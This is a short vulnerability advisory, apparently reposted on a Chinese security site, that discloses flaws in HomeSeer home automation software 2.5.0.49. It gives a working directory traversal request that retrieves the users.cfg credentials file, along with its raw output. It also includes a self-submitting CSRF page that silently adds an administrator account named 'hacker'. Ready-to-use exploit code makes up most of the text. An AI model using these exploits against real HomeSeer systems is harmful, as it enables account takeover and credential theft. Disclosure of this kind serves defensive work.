HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day) 作者: Silent_Dream 下载 地址: http://www.homeseer.com/pub/setuphs2_5_0_49.exe 影响版本: 2.5.0.49 测试平台: Win XP 注释: This affects both HomeSeer HS2 and HomeSeer PRO. #Previously reported XSS attack vector (elog) reported to CERT was fixed in 2.5.0.49 update. A) 目录遍历: Retrieving the users.cfg file which contains HomeSeer usernames, access levels, and encrypted passwords. ncat 192.168.0.1 80 GET /..\Config\users.cfg HTTP/1.0 HTTP/1.0 200 OK Server: HomeSeer Content-Type: application/ Accept-Ranges: bytes Content-Length: 195 2 EFBBBF6775657374,EFBBBF4853454E4332774B51364D614C53436D534D41697A48617450514D513 D3D,EFBBBF31 EFBBBF64656661756C74,EFBBBF4853454E43327A68336A307A412F585153776F7032575A54534E6 3773D3D,EFBBBF36 B) 跨站请求伪造: It is possible to add a new admin user by tricking logged-in admin to visit a malicious URL. 该poc可以添加一个名和密码为hacker的管理员 < html > <body onload="javascript:document.forms[0].submit()"> <H2>HomeSeer CSRF Exploit to add new administrator account</H2> <form method="POST" name="form0" action="http://www.2cto.com /ctrl "> <input type="hidden" name="wuNEWUSERNAME" value="hacker"/> <input type="hidden" name="wuNEWUSERPASS" value="hacked"/> <input type="hidden" name="wuNEWUSERRIGHTS" value="Admin"/> <input type="hidden" name="wuNEWUSERADD" value="Add"/> <input type="hidden" name="stay_on_webusers" value="Hello"/> </form> </body> </html> 修复 加强验证
查看更多关于HomeSeer HS2 and HomeSeer PRO多个缺陷及修复 - 网站安全的详细内容...